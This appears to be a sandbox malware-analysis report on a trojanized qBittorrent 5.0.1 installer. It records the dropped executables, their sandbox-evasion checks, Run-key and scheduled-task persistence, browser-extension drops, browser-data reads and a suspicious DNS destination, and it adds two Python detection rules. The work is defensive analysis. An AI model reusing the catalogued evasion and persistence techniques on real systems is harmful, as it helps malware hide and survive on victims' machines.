Analysis
max time kernel: 1050s
max time network: 1052s
platform: windows11-21h2_x64
resource: win11-20241007-en
resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 15-11-2024 04:55
Tasks (every task ran on resource win11-20241007-en)
static1 (static task)
behavioral1: qbittorrent_5.0.1_x64_setup.exe
behavioral2: $PLUGINSDIR/FindProcDLL.dll
behavioral3: $PLUGINSDIR/LangDLL.dll
behavioral4: $PLUGINSDIR/System.dll
behavioral5: $PLUGINSDIR/UAC.dll
behavioral6: $PLUGINSDIR/nsDialogs.dll
behavioral7: $PLUGINSDIR/nsisFirewallW.dll
behavioral8: qbittorrent.exe
behavioral9: uninst.exe
behavioral10: $PLUGINSDIR/FindProcDLL.dll
behavioral11: $PLUGINSDIR/LangDLL.dll
behavioral12: $PLUGINSDIR/System.dll
behavioral13: $PLUGINSDIR/UAC.dll
behavioral14: $PLUGINSDIR/nsisFirewallW.dll
General
Target: qbittorrent_5.0.1_x64_setup.exe
Size: 37.4MB
MD5: fd6ea4e1d7b3adb820908ec26b729ea7
SHA1: 485b31d0f8394efdaa860c0d4a54227033f40579
SHA256: 5513812584a5ba7810b812db7ceec2d0e9cb214cef95a2580e29927cf4fe9921
SHA512: e587c67bd4da787226187918206acfdb9ef4192e884b41e0680cf96458799eeeabde97376dbdfdd89c7de12839a062bd8f8da50b9e6a49c33018461783535c66
SSDEEP: 786432:7fFBmZOcw9i54tPYrFrQAEODhrbt+Fn1/Zo2NCILF5Iud3gIwmbN:79BH1e+sFspIteZtQILFDdQIwm5
Malware Config
Signatures
Blocklisted process makes network request (1 IoC)
flow 274, pid 3688, rundll32.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 8 IoCs)
Run PowerShell and hide display window.
pids: 5244 powershell.exe, 4584 powershell.exe, 5808 powershell.EXE, 1172 powershell.exe, 4216 powershell.exe, 1768 powershell.exe, 1628 powershell.exe, 4656 powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion by cihvqPa9fiUGQzUJzD3H.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion by rundll32.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
Key value queried \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\International\Geo\Nation by fyArOsB.exe

Executes dropped EXE (64 IoCs)
pid(s) and process, in report order; consecutive launches of the same image are grouped on one line:
3816 qbittorrent.exe
2336 is-N2EH9.tmp
1460 bommixpro.exe
3120 GtBtte.exe
1368 Izaw0OcctowNceUeU.exe
396 Izaw0OcctowNceUeU.tmp
856 shineencoder.exe
3252 6OOwtsS.exe
4588, 1864, 2564, 4572, 3260 setup.exe
3396 0VWXDTifa42.exe
2860 0VWXDTifa42.tmp
4736 utorrent9.exe
4948 cihvqPa9fiUGQzUJzD3H.exe
1172 utorrent9.tmp
3080 qbittorrent.exe
2956 Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe
4032, 3292 assistant_installer.exe
4876 setup.exe
424, 4372, 2752, 1560, 4488, 2848, 5472 Snetchball.exe
5824 cihvqPa9fiUGQzUJzD3H.exe
4860, 6116, 6056, 1892, 3484, 408, 4732, 4544, 5528, 444, 5692 Snetchball.exe
5308 fyArOsB.exe
712 qbittorrent.exe
5548, 3828, 924, 2940, 5196, 4844, 4220, 3424, 2728, 2244, 5816, 5424, 5348, 5160, 1628, 5848, 764, 4888, 2328, 2708 Snetchball.exe

Indirect Command Execution (1 TTP, 2 IoCs)
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pids: 768 forfiles.exe, 2848 forfiles.exe

Loads dropped DLL (64 IoCs)
pid, process and number of loads recorded:
3900 qbittorrent_5.0.1_x64_setup.exe (7)
2336 is-N2EH9.tmp (1)
1460 bommixpro.exe (1)
3120 GtBtte.exe (9)
396 Izaw0OcctowNceUeU.tmp (1)
856 shineencoder.exe (1)
4588, 1864, 2564, 4572, 3260 setup.exe (1 each)
2860 0VWXDTifa42.tmp (6)
4876 setup.exe (1)
424 Snetchball.exe (8)
4372 Snetchball.exe (6)
1560 Snetchball.exe (6)
2752 Snetchball.exe (4)
4488 Snetchball.exe (4)
2848 Snetchball.exe (4)

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Unexpected DNS network traffic destination (1 IoC)
Network traffic to servers other than the configured DNS servers was detected on the DNS port.
Destination IP: 91.211.247.248
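The signature above says only that something sent traffic on port 53 to a host that is not one of the sandbox's configured resolvers. The Python below, added here as an example and not taken from the report or from the sandbox vendor, runs the same check over a few constructed lines in a reduced Zeek conn.log shape. The resolver address and every log line are assumptions; the only value taken from the report is the destination IP.

```python
"""Flag DNS-port traffic that does not go to the configured resolvers.

Added example, not part of the sandbox report. The log lines below are
constructed in a reduced Zeek conn.log shape (tab-separated: ts, uid,
id.orig_h, id.orig_p, id.resp_h, id.resp_p, proto) and only mirror the
report's finding of port-53 traffic to 91.211.247.248. The resolver set is an
assumed sandbox setting; on a real host it comes from the DHCP lease or the
interface's DNS configuration.
"""
from collections import Counter
from ipaddress import ip_address

# Assumed: the analysis VM was handed this resolver (not stated in the report).
CONFIGURED_RESOLVERS = {"10.127.0.1"}

# Constructed records. The malformed last line checks that parsing is strict.
SAMPLE_CONN_LOG = """\
1731646512.101\tCxa1\t10.127.0.10\t51234\t10.127.0.1\t53\tudp
1731646512.230\tCxa2\t10.127.0.10\t51235\t10.127.0.1\t53\tudp
1731646520.004\tCxa3\t10.127.0.10\t51236\t91.211.247.248\t53\tudp
1731646521.118\tCxa4\t10.127.0.10\t51237\t91.211.247.248\t53\ttcp
1731646522.501\tCxa5\t10.127.0.10\t51238\t91.211.247.248\t443\ttcp
1731646523.777\tCxa6\t10.127.0.10\t51239\tnot-an-ip\t53\tudp
"""


def parse_conn_log(text):
    """Yield (resp_h, resp_p, proto) for each well-formed, non-comment line."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) < 7:
            continue
        resp_h, resp_p, proto = fields[4], fields[5], fields[6]
        try:
            ip_address(resp_h)  # reject garbage addresses instead of matching on them
            port = int(resp_p)
        except ValueError:
            continue
        yield resp_h, port, proto.lower()


def unexpected_dns_destinations(text, resolvers=CONFIGURED_RESOLVERS):
    """Count flows to port 53 per (destination, proto) whose destination is not
    a configured resolver. Traffic to the resolvers themselves is exempt; any
    other port is ignored because this rule is about the DNS port only."""
    hits = Counter()
    for resp_h, port, proto in parse_conn_log(text):
        if port == 53 and resp_h not in resolvers:
            hits[(resp_h, proto)] += 1
    return dict(hits)


if __name__ == "__main__":
    for (dst, proto), n in sorted(unexpected_dns_destinations(SAMPLE_CONN_LOG).items()):
        print(f"{dst}/{proto}: {n} flow(s) on port 53 to a non-resolver")
```

A hit from this rule is a pointer, not a verdict: software that hard-codes its own resolver trips it just as well, and the report does not say what the traffic to 91.211.247.248 carried, so the destination is worth enriching before it is treated as command-and-control.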
Adds Run key to start application (2 TTPs, 1 IoC)
Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" by setup.exe

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops Chrome extension (2 IoCs)
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json by fyArOsB.exe
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json by fyArOsB.exe

Drops desktop.ini file(s) (1 IoC)
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini by fyArOsB.exe

Enumerates connected drives (3 TTPs, 5 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
File opened (read-only) \??\D: by setup.exe
File opened (read-only) \??\F: by setup.exe
File opened (read-only) \??\F: by setup.tmp
File opened (read-only) \??\D: by setup.exe
File opened (read-only) \??\F: by setup.exe

Drops file in System32 directory (29 IoCs)
fyArOsB.exe, under P = C:\Windows\SysWOW64\config\systemprofile\AppData (the LocalSystem account's profile as seen by 32-bit processes), all "File opened for modification":
P\LocalLow\Microsoft
P\LocalLow\Microsoft\CryptnetUrlCache
P\LocalLow\Microsoft\CryptnetUrlCache\Content
P\LocalLow\Microsoft\CryptnetUrlCache\MetaData
P\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 and P\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
P\LocalLow\Microsoft\CryptnetUrlCache\Content\1DEB6997DB25CE8EC844B742DDA6F019 and P\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DEB6997DB25CE8EC844B742DDA6F019
P\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 and P\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
P\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA and P\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
P\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 and P\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311
P\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B5CFE5FD779BB3279A8A1976B86E6FEF and P\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B5CFE5FD779BB3279A8A1976B86E6FEF
P\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 and P\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7
P\Local\Microsoft\Windows\INetCache\IE
P\Local\Microsoft\Windows\INetCache\Content.IE5
P\Local\Microsoft\Windows\History\History.IE5
P\Local\Microsoft\Windows\INetCookies
fyArOsB.exe: File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol
cihvqPa9fiUGQzUJzD3H.exe: File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol and C:\Windows\system32\GroupPolicy\gpt.ini
powershell.exe: File created (once) and opened for modification (twice) P\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive; File created P\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Drops file in Program Files directory (53 IoCs)
qbittorrent_5.0.1_x64_setup.exe, under C:\Program Files\qBittorrent (the qBittorrent application files):
File created qbittorrent.exe (also opened for modification), uninst.exe, qt.conf, qbittorrent.pdb
File created translations\qtbase_{ar,bg,ca,cs,da,de,es,fa,fi,fr,gd,he,hr,hu,it,ja,ka,ko,lv,nl,nn,pl,pt_BR,ru,sk,tr,uk,zh_CN,zh_TW}.qm and translations\qt_{gl,lt,pt_PT,sl,sv}.qm
fyArOsB.exe:
File created and opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja
File created and opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi
File created C:\Program Files (x86)\kmKpunNFSNUn\miGLjZP.dll
File created C:\Program Files (x86)\OMeOFycTU\sDlzcs.dll and C:\Program Files (x86)\OMeOFycTU\IbVSERq.xml
File created C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\VbwHiFR.dll and C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\ZPZMxro.xml
File created C:\Program Files (x86)\NOWTtjuGDiydC\NVyKOwG.dll and C:\Program Files (x86)\NOWTtjuGDiydC\tRAjDwC.xml
File created C:\Program Files (x86)\RnBNRnIwUzVU2\fskDJltzbcOsh.dll and C:\Program Files (x86)\RnBNRnIwUzVU2\MhVtTAB.xml

Drops file in Windows directory (19 IoCs)
Snetchball.exe: File opened for modification C:\Windows\SystemTemp (9 times)
Snetchball.exe: File created, under C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4220_1781550272: _platform_specific\win_x86\widevinecdm.dll, _platform_specific\win_x86\widevinecdm.dll.sig, _metadata\verified_contents.json, manifest.fingerprint, manifest.json, LICENSE
schtasks.exe: File created C:\Windows\Tasks\kWTyeDFhQZoEtpUUx.job, C:\Windows\Tasks\bhzAbyJhiYArNEwhRY.job, C:\Windows\Tasks\VGggbamSlsorNxx.job, C:\Windows\Tasks\coQLnzjOCQIuUMNyn.job

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Program crash (64 IoCs)
WerFault.exe instances grouped by the crashing process (pid_target / procid_target; image names taken from the Executes dropped EXE list above):
pid_target 1460 / procid_target 115 (bommixpro.exe): 61 WerFault.exe instances, pids 2628, 2080, 3860, 2560, 1040, 4372, 2808, 1172, 1232, 2672, 4616, 2148, 888, 4776, 2076, 3416, 3612, 4896, 2752, 2676, 4176, 4680, 768, 3564, 2640, 4784, 2656, 2152, 3940, 2072, 1404, 2412, 908, 4644, 3324, 1376, 928, 3320, 1500, 4876, 2704, 2352, 1000, 3128, 4184, 1596, 400, 4644, 1800, 3060, 1444, 3312, 4192, 4876, 3128, 6000, 5188, 5928, 5540, 436, 4632
pid_target 5824 / procid_target 274 (cihvqPa9fiUGQzUJzD3H.exe): WerFault.exe pid 5248
pid_target 4948 / procid_target 245 (cihvqPa9fiUGQzUJzD3H.exe): WerFault.exe pid 196
pid_target 5308 / procid_target 366 (fyArOsB.exe): WerFault.exe pid 5284

System Location Discovery: System Language Discovery (1 TTP, 64 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by process (count):
Snetchball.exe (38), reg.exe (8), schtasks.exe (7), shineencoder.exe (1), utorrent9.tmp (1), 0VWXDTifa42.tmp (1), 0VWXDTifa42.exe (1), cihvqPa9fiUGQzUJzD3H.exe (1), forfiles.exe (1), cmd.exe (1), 6OOwtsS.exe (1), powershell.exe (1), assistant_installer.exe (1), setup.exe (1)

System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 2 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
pids: 3688 rundll32.exe, 2420 rundll32.EXE
NSIS installer (2 IoCs)
behavioral1/files/0x008c00000002aa96-728.dat matched yara rules nsis_installer_1 and nsis_installer_2

Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 by Snetchball.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags by Snetchball.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 by Snetchball.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags by Snetchball.exe
The device IDs themselves show why this key is worth reading: the DVD-ROM entry carries the vendor string QEMU, so any process that enumerates this key can see the virtualisation platform without calling a single hypervisor-detection API.

Enumerates system info in registry (2 TTPs, 7 IoCs)
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS by msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer by msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName by msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS by cihvqPa9fiUGQzUJzD3H.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName by cihvqPa9fiUGQzUJzD3H.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS by rundll32.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName by rundll32.exe
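Most of the registry and file signatures in this report reduce to an operation type, a path pattern and a process name. The Python below, added here as an example and not the sandbox's own signature code, re-expresses the BIOS, system-info, SCSI, Geo\Nation and NLS\Language checks, the Run-key persistence, the .job drops under C:\Windows\Tasks and the Chrome extension drops as such rules and runs them over constructed event rows copied from this report's IoC lines plus two benign controls. The rule names follow the report's signature names where one exists; the process baseline and the "user-writable target" test on the Run value are assumptions.

```python
"""Re-express several of the report's signatures as path rules and run them
over constructed host events.

Added example, not the sandbox's own signature code. Events are constructed
(op, path, process, value) rows shaped like the report's IoC lines; the
process baseline is an assumption about what reads these keys on a clean host.
"""
import re
from collections import Counter


def _points_into_user_writable(value):
    """True when an autorun value targets a location a standard user can write."""
    v = (value or "").lower()
    return any(p in v for p in ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\"))


# (name, operations, path regex, value predicate, honour_baseline)
# Paths are matched case-insensitively. honour_baseline marks rules that are
# noisy for ordinary Windows tooling and so ignore baseline processes.
RULES = [
    ("Checks BIOS information in registry", {"Key value queried"},
     r"\\hardware\\description\\system\\systembiosversion$", None, True),
    ("Enumerates system info in registry", {"Key opened", "Key value queried"},
     r"\\hardware\\description\\system\\bios(\\[^\\]+)?$", None, True),
    ("Checks SCSI registry key(s)", {"Key opened", "Key value queried"},
     r"\\controlset\d+\\enum\\scsi\\", None, True),
    ("Checks computer location settings", {"Key value queried"},
     r"\\control panel\\international\\geo\\nation$", None, True),
    ("System Location Discovery: System Language Discovery", {"Key opened"},
     r"\\controlset\d+\\control\\nls\\language$", None, True),
    ("Adds Run key to start application", {"Set value (str)"},
     r"\\software\\microsoft\\windows\\currentversion\\run\\[^\\]+$",
     _points_into_user_writable, False),
    ("Scheduled task file written to Windows\\Tasks", {"File created"},
     r"^c:\\windows\\tasks\\[^\\]+\.job$", None, False),
    ("Drops Chrome extension", {"File created"},
     r"\\google\\chrome\\user data\\[^\\]+\\extensions\\[a-p]{32}\\[^\\]+\\manifest\.json$",
     None, False),
]

# The report's own Language-discovery list includes reg.exe, schtasks.exe,
# cmd.exe and powershell.exe, so ordinary tooling trips that rule; hits from
# these are dropped for baseline-honouring rules. Assumed set, not from the report.
BASELINE_PROCESSES = {"reg.exe", "schtasks.exe", "cmd.exe", "powershell.exe", "msedge.exe"}


def evaluate(events, rules=RULES, baseline=BASELINE_PROCESSES):
    """Return {rule_name: Counter({process: hit_count})} for the matching events."""
    hits = {}
    for op, path, process, value in events:
        for name, ops, pattern, predicate, honour_baseline in rules:
            if honour_baseline and process.lower() in baseline:
                continue
            if op not in ops or not re.search(pattern, path, re.IGNORECASE):
                continue
            if predicate is not None and not predicate(value):
                continue
            hits.setdefault(name, Counter())[process] += 1
    return hits


SID = r"\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000"
# Constructed events: the first twelve copy IoC rows from the report, the last
# two are benign controls that must not fire.
SAMPLE_EVENTS = [
    ("Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion", "cihvqPa9fiUGQzUJzD3H.exe", None),
    ("Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion", "rundll32.exe", None),
    ("Key opened", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS", "msedge.exe", None),
    ("Key value queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName", "cihvqPa9fiUGQzUJzD3H.exe", None),
    ("Key opened", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000", "Snetchball.exe", None),
    ("Key value queried", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags", "Snetchball.exe", None),
    ("Key value queried", SID + r"\Control Panel\International\Geo\Nation", "fyArOsB.exe", None),
    ("Key opened", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language", "Snetchball.exe", None),
    ("Key opened", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language", "reg.exe", None),
    ("Set value (str)", SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\Snetchball", "setup.exe",
     r"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"),
    ("File created", r"C:\Windows\Tasks\kWTyeDFhQZoEtpUUx.job", "schtasks.exe", None),
    ("File created", r"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json", "fyArOsB.exe", None),
    # Controls (constructed): an autorun into Program Files, and a Geo\Nation read by a baseline process.
    ("Set value (str)", SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\VendorUpdater", "vendor_setup.exe",
     r"C:\Program Files\Vendor\updater.exe"),
    ("Key value queried", SID + r"\Control Panel\International\Geo\Nation", "powershell.exe", None),
]

if __name__ == "__main__":
    for rule, procs in evaluate(SAMPLE_EVENTS).items():
        print(f"{rule}: {dict(procs)}")
```

The baseline is what separates a signal from a count: reg.exe, schtasks.exe, cmd.exe and powershell.exe all appear in this report's Language-discovery list because they read NLS\Language as a matter of course, so that signature only carries weight for processes that should not be on the host at all. The Run-key rule is scoped the other way round: it fires for any process, but only when the autorun target sits under a user-writable path such as the AppData\Roaming location the report shows for Snetchball.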
Modifies Control Panel (13 IoCs)
Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" by Snetchball.exe (13 times)

Modifies data under HKEY_USERS (64 IoCs; the page ends mid-list after 52 entries)
powershell.exe, Key created under \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates (count in parentheses where repeated):
CA\CRLs (3), CA\CTLs, Disallowed, Disallowed\CRLs, Disallowed\CTLs, Root, Root\CRLs, Root\Certificates (2), SmartCardRoot, SmartCardRoot\CRLs, SmartCardRoot\Certificates (3), TrustedPeople, TrustedPeople\CTLs (3), TrustedPeople\Certificates (2), trust, trust\CRLs (2), trust\CTLs, trust\Certificates (2)
powershell.exe, Key created under \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates:
CA, CA\CRLs, Disallowed (2), Disallowed\CTLs (2), Disallowed\Certificates, TrustedPeople, TrustedPeople\CRLs (2), TrustedPeople\CTLs (2), TrustedPeople\Certificates, trust, trust\CRLs, trust\CTLs, trust\Certificates
powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
cihvqPa9fiUGQzUJzD3H.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
fyArOsB.exe:
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{50662fab-0000-0000-0000-d01200000000}\MaxCapacity = "14116"
Key created
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{50662fab-0000-0000-0000-d01200000000} fyArOsB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" fyArOsB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing fyArOsB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Modifies registry class 34 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\qBittorrent.File.Torrent\shell\open\command qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\Software\Classes\qBittorrent.Url.Magnet\DefaultIcon qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\Software\Classes\magnet qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent\ = "Torrent File" qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\Software\Classes\qBittorrent.File.Torrent qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent\shell\open\command\ = "\"C:\\Program Files\\qBittorrent\\qbittorrent.exe\" \"%1\"" qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\magnet\Content Type = "application/x-magnet" qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\Software\Classes\qBittorrent.Url.Magnet qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet\shell\open\command qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\Software\Classes\.torrent qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Key created 
\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe Key created \REGISTRY\MACHINE\Software\Classes\qBittorrent.File.Torrent\DefaultIcon qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent\DefaultIcon\ = "\"C:\\Program Files\\qBittorrent\\qbittorrent.exe\",1" qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet\DefaultIcon\ = "\"C:\\Program Files\\qBittorrent\\qbittorrent.exe\",1" qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\Software\Classes\qBittorrent.Url.Magnet\shell\open\command qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet\shell\open\command\ = "\"C:\\Program Files\\qBittorrent\\qbittorrent.exe\" \"%1\"" qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\magnet\URL Protocol qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings bommixpro.exe Key 